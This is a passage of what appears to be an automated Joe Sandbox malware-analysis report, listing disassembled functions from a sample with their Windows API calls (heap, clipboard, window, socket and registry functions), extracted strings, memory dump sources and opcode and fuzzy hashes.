                                                                                                                                                                                                                                                                                                        Function 007A1748 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,007A12D6,00000001,00000364,00000000,?,000000FF,?,007A44E3,?,?,00000000), ref: 007A1789
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                                                                                                                        • Instruction ID: 154d7c5781bc45dc2e1e534129e35c8708544993023084300fd8ef5a2906b620
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0596b3e3bb4ee076d882318f24e778a83a401db1bf84a202353ae450301ec008
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77F0E931600234AAFB612A329C49B7B37489FC37B0F549312FC189A090EA2CDC0046E4
                                                                                                                                                                                                                                                                                                        Function 007A3D41 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNELBASE(?,007A0C92,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 007A3D75
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: String
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                                                                                                                        • Instruction ID: f5da0ac4411f4585a45001adfe7889a157d9ede36c0b1885ca72ad1c5d438d21
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d727af7c0b24174baf6674acea18e18495a24099b1991f5a4d4d2d4c43d856f5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2F07A3650021EFBCF126F90DC09DDE3F26EF89360F058211FA1825020C73AC931AB90
                                                                                                                                                                                                                                                                                                        Function 0079BEFA Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(?,00000000,?), ref: 0079BFCE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1fc4dd6c3aeaaee0817216e36ba63e5b521813be904bdd1d1e2e3dac9636e59c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 690d0b966addc1296c1a84957827a07f248c1aeee82d1611503b10e66bc6485d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA312871900209AFCB10DFA9ED80BAEBBF5FF48710F10802AE559AB250D779A905CF94
                                                                                                                                                                                                                                                                                                        Function 0079BC80 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0079BCC7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                                                                                                                        • Instruction ID: f5ba4a2137a67daeb2fbb8b41962ef0f6117c7a666148d136e8c43de06cc210a
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2b98aa5a84afd173d90c2bfe6f1fcf2b928bb24c025f6a62b163b41e7890a4c3
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7E06DB5901622BB97112B20BE09E7B766CEF927413048525FA24E2240DF38DC11C6B5

                                                                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                                                                        Function 004D9AB0 Relevance: 22.6, APIs: 15, Instructions: 136clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000002), ref: 004D9B06
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B17
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B28
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,00000000), ref: 004D9B51
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000001), ref: 004D9B61
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9B70
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9B81
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00002002,00000003,?,?,?,00000000,0040D599,00000000,00000000), ref: 004D9BB8
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 004D9BC5
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004D9BDB
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 004D9BEB
                                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 004D9BF5
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004D9C08
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004D9C11
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 004D9C13
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Global$Clipboard$AllocLockUnlock$Data$ByteCharCloseEmptyMultiOpenWide
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3392129136-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                        • Instruction ID: e40826f6a6b6de4095afa5ba746f594757548e465f4129e7c784a6b23cc7d310
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ce6bc6ff71d1a8c4d07697407ae3b5d450af23bfff1a9a29fd96cc425f21c01
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A41F371104302ABE3111B61BC99B277BFCAFA1B04F09041BF986D7341DA69EC09D7BA
                                                                                                                                                                                                                                                                                                        Function 0079CDD5 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                                                                                                                        • Instruction ID: 20744ecfedf4c28fd76f74ea8c3d8a786a43a3a68d56d5ce4262764e8bcaaa8c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab678024b27634cae8f009ada00d78c64daba5d8a61eb3502b89817b54d872ca
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2516CB1A122099FEF16CF59E9D17AEBBF1FB48310F14806AD405EB250D3789940CF51
                                                                                                                                                                                                                                                                                                        Function 007A9277 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000003.1903619913.0000000000770000.00000040.00000400.00020000.00000000.sdmp, Offset: 00770000, based on PE: true
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_3_770000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                        • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3a0743dcc37270f94bbdfc13b256ffb0086501d309c9e3f5df53f5aed5376cb7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66F06D79A00200EF8B24DF0AC548E95B7F6FBC6720B6546A5E504DB2A1D3B8ED54CBA0
                                                                                                                                                                                                                                                                                                        Function 004D7960 Relevance: 70.1, APIs: 20, Strings: 20, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                        • String ID: WSAAsyncGetHostByName$WSAAsyncSelect$WSACancelAsyncRequest$WSACleanup$WSAGetLastError$WSAStartup$WSOCK32.DLL$accept$bind$closesocket$connect$htonl$htons$inet_addr$listen$recv$recvfrom$send$sendto$socket
                                                                                                                                                                                                                                                                                                        • API String ID: 0-3677570488
                                                                                                                                                                                                                                                                                                        • Opcode ID: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8c9ac86f1f98df4bb1f2f2f05f7a43d8bd4a8589446ea9a4d4fdb8b68f6288ad
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92a4acbc399bf9b3ce295a5f3de41989e4871b31030ec6fc55de6d5f39285aff
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5031DE71D523646AD7206BB9EC19DEF3EACFBB6704B510517F000972A0EAF88458AF94
                                                                                                                                                                                                                                                                                                        Function 004F4A60 Relevance: 43.9, APIs: 22, Strings: 7, Instructions: 376COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 004F4A89
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4AFB
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4BF2
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000000), ref: 004F4CEA
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,?), ref: 004F4CFD
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D17
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D1A
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D36
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D5D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D66
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4D81
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4D87
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4DB6
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4DC0
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4E05
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E11
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000), ref: 004F4E7D
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4E9C
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EB3
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4ED9
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 004F4EF4
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004F4F06
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                                                                        • String ID: NetStream.Play.Start$NetStream.Play.Stop$NetStream.Play.StreamNotFound$NetStream.Seek.InvalidTime$NetStream.Seek.Notify$error$status
                                                                                                                                                                                                                                                                                                        • API String ID: 2978645861-761530088
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                        • Instruction ID: 162dc2aece2cb8deeda7270d3cf99ca9d96a23cce06d37320eaaf024755f17c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8031fb2b16cf08ebb29042ea612b824201a734ec780002ffcc35b8889f179ffa
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7E190352047459FD320DB34C845BABBBE1BF89714F04895DE9AA57382CB74F80ACB65
                                                                                                                                                                                                                                                                                                        Function 004D5D20 Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 284COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?,?), ref: 004D5D5F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                                                                                                                                                                                        • String ID: D$FSCommand:$\fscommand$allowscale$exec$fullscreen$quit$showmenu$trapallkeys
                                                                                                                                                                                                                                                                                                        • API String ID: 3375834691-1928458085
                                                                                                                                                                                                                                                                                                        • Opcode ID: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7647b0b3e504c4bbb0374484e0d8b702cf2a7569de5a553b4a60fd35f403e9ef
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 651f01098ba612e2aa20b3cdcfc404e6a88be88dae9858ed9b192afdef851395
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27914C35504B015BCB24EF28EC617FBB791AFA6309F44451FE8888B341DB2A990BC7D9
                                                                                                                                                                                                                                                                                                        Function 004DB4E0 Relevance: 22.7, APIs: 15, Instructions: 180windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB511
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB531
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB541
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB55D
                                                                                                                                                                                                                                                                                                        • GetMenu.USER32(?), ref: 004DB581
                                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 004DB596
                                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 004DB5B0
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 004DB5BC
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000000,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB5E1
                                                                                                                                                                                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004DB604
                                                                                                                                                                                                                                                                                                        • SetWindowLongA.USER32(?,000000F0,?), ref: 004DB62A
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB66D
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004DB6A5
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004DB6B7
                                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?,?,?,?,004D5D9E,00000000), ref: 004DB702
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000022.00000002.1908084668.0000000000401000.00000020.00000001.01000000.00000010.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908053339.0000000000400000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908489056.000000000053D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000555000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1908563516.0000000000562000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000628000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006E7000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.00000000006F5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.0000000000700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000022.00000002.1909113783.000000000073C000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_34_2_400000_1061714629.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Rect$Long$ClientMenuMove$Desktop
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3087884050-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                        • Instruction ID: afb7dc4107877f96dc9ff69242aee4b267e14dc018c2a581ac30f1de2d6509eb
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b644bd01d25a479bd3a154174cbb076086dd9edafcd01cccc19a768557d6cf23
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C61F7756047009FE714CF79D888FA7B7E9EB98314F108A1EE5AA83344DE74B8088B65
                                                                                                                                                                                                                                                                                                        Function 004CFE40 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 164registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFE8F
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFEC1
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFF52
                                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?), ref: 004CFF84
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,00000000), ref: 004CFFF3
